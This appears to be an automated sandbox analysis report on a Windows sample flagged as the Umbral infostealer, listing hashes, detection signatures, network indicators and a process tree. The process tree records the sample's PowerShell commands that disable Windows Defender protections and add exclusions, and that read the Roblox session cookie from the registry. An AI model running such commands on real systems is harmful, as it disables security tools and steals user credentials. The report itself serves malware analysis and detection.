Analysis
- max time kernel: 95s
- max time network: 142s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 18/09/2024, 07:05
Behavioral task: behavioral1
- Sample: everything.exe
- Resource: win10v2004-20240802-en
General
- Target: everything.exe
- Size: 231KB
- MD5: c230d0ffbb5ba00f2bc8a3e51c831d30
- SHA1: ba14e05c5b2f9bd82895598e4e037971cb88cb75
- SHA256: cf7b9914e5b25efd7b449a9426d8d2cb570440da613b0bf7b258b425d2c6a7a0
- SHA512: d4930c2f78d55037819d276e4321d43b759fb063834fd6b0e494730bad35f6815c2665106a3a976e8902b58b058a09ab3d6369c56dcc16aebfa487dbf66ef318
- SSDEEP: 6144:RloZMArIkd8g+EtXHkv/iD4av2h3tW+xdkt/qqfsCb8e1mKi:joZHL+EP8av2h3tW+xdkt/qqfPI
Malware Config
Signatures
- Detect Umbral payload (1 IoC)
  resource: behavioral1/memory/1500-1-0x000001AEDBB40000-0x000001AEDBB80000-memory.dmp
  yara_rule: family_umbral
- Credentials from Password Stores: Credentials from Web Browsers (1 TTP)
  Malicious access to, or copying of, the web browser credential store.
- Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid   Process
  3500  powershell.exe
  1124  powershell.exe
  2280  powershell.exe
  2172  powershell.exe
- Drops file in Drivers directory (1 IoC)
  description                   ioc                                    Process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  everything.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  24    discord.com
  23    discord.com
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  18    ip-api.com
- Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine the installed video card.
  pid   Process
  4240  wmic.exe
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid   Process
  3500  powershell.exe
  3500  powershell.exe
  2172  powershell.exe
  2172  powershell.exe
  1124  powershell.exe
  1124  powershell.exe
  2976  powershell.exe
  2976  powershell.exe
  2280  powershell.exe
  2280  powershell.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid   Process         tokens adjusted
  1500  everything.exe  SeDebugPrivilege
  3500  powershell.exe  SeDebugPrivilege
  2172  powershell.exe  SeDebugPrivilege
  1124  powershell.exe  SeDebugPrivilege
  2976  powershell.exe  SeDebugPrivilege
  2488  wmic.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this set is recorded twice: 42 IoCs)
  3480  wmic.exe        SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege (17 IoCs)
- Suspicious use of WriteProcessMemory (18 IoCs; each event below is recorded twice)
  description                       pid   Process         procid_target
  PID 1500 wrote to memory of 3500  1500  everything.exe  82
  PID 1500 wrote to memory of 2172  1500  everything.exe  84
  PID 1500 wrote to memory of 1124  1500  everything.exe  86
  PID 1500 wrote to memory of 2976  1500  everything.exe  88
  PID 1500 wrote to memory of 2488  1500  everything.exe  92
  PID 1500 wrote to memory of 3480  1500  everything.exe  95
  PID 1500 wrote to memory of 4304  1500  everything.exe  97
  PID 1500 wrote to memory of 2280  1500  everything.exe  99
  PID 1500 wrote to memory of 4240  1500  everything.exe  101
Processes

[level 1] C:\Users\Admin\AppData\Local\Temp\everything.exe (PID 1500)
  command line: "C:\Users\Admin\AppData\Local\Temp\everything.exe"
  - Drops file in Drivers directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3500)
    command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\everything.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2172)
    command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1124)
    command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2976)
    command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\Wbem\wmic.exe (PID 2488)
    command line: "wmic.exe" os get Caption
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\Wbem\wmic.exe (PID 3480)
    command line: "wmic.exe" computersystem get totalphysicalmemory
    - Suspicious use of AdjustPrivilegeToken

  [level 2] C:\Windows\System32\Wbem\wmic.exe (PID 4304)
    command line: "wmic.exe" csproduct get uuid

  [level 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2280)
    command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses

  [level 2] C:\Windows\System32\Wbem\wmic.exe (PID 4240)
    command line: "wmic" path win32_VideoController get name
    - Detects videocard installed
Network
MITRE ATT&CK Enterprise v15
Downloads